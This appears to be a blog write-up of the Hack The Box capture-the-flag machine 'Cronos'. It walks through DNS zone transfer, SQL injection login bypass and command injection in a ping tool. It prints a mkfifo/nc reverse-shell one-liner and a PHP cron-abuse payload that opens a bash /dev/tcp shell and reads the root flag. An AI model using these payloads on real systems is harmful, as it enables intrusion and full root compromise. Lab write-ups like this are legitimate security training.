Cronos — HTB Machine
Today we are going to solve another machine called Cronos….. I have fired it up and run my nmap script to give me initial scans which shows three ports open let’s dig deeper into those……
Upon visiting the webpage :
When clicked on Documentation it takes me to the documentation page of laravel….
Since everythign was very simple and i couldn’t find anything i tried Gobuster and Sublist3r both to find out vhost/subdomain to the parent domain but Due to some reason i was unable to find anything. When i did some research i found out I am on the right path so. I restarted the machine and then tried again..
i was still not able to get any vhost from the machine …..
Then I came across a command which helped me to get the value for the subdomain
host -l <domain_name> <IP>
I will add admin.cronos.htb in the hosts file …….
Upon loading the admin page I only got a simple login page then i started dirsearch on the domain.. admin.cornos.htb
Found config.php but it was supposedly a rabbit hole …
Didn’t find anything in diectory listing as well……
We do have a cookie here
I tried SQL injection on the tool and found this …….
Net tool is a tool that gives you two functionality :
One → to traceroute
Two → to PING
Hindering with the burp request of PING i got command injection on the mahcine
Since we have command injection so we can execute a command and then get a reverse shell
used this
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/fpayload and URL encoded it to run on the box
- * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
I changed the content of atrisan and i did got a connection request but it did not give me a reverse shell on my machine
I tried some more times but it did not work so I had to get creative and get the root flag
Content of Artisan:
<?php
// Change these values accordingly
$ip = ‘10.10.14.6’;
$port = 1456;// Create a TCP/IP socket
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);// Attempt to connect to the provided IP and port
if (socket_connect($sock, $ip, $port) === false) {
die(‘Could not connect to ‘ . $ip . ‘:’ . $port . PHP_EOL);
}// Set socket to non-blocking mode
socket_set_nonblock($sock);// Spawn a shell
shell_exec(‘bash -c “bash -i >& /dev/tcp/’ . $ip . ‘/’ . $port . ‘ 0>&1”’);
$output = shell_exec(‘cat /root/root.txt’);
file_put_contents(‘/var/www/laravel’, $output);
?>
>>>> root.txt has the content of root flag
That is how we have PAWNED another machine for the day!! HAPPY HACKING UNTIL NEXT TIMEEE
My Review:
This box is a fundamental one and you might have to think out of the box in the start and end other than that the journey in the middle is a breeze if you are up for it. There are several rabbit holes. SO MIND YOUR STEPS !! 😂😁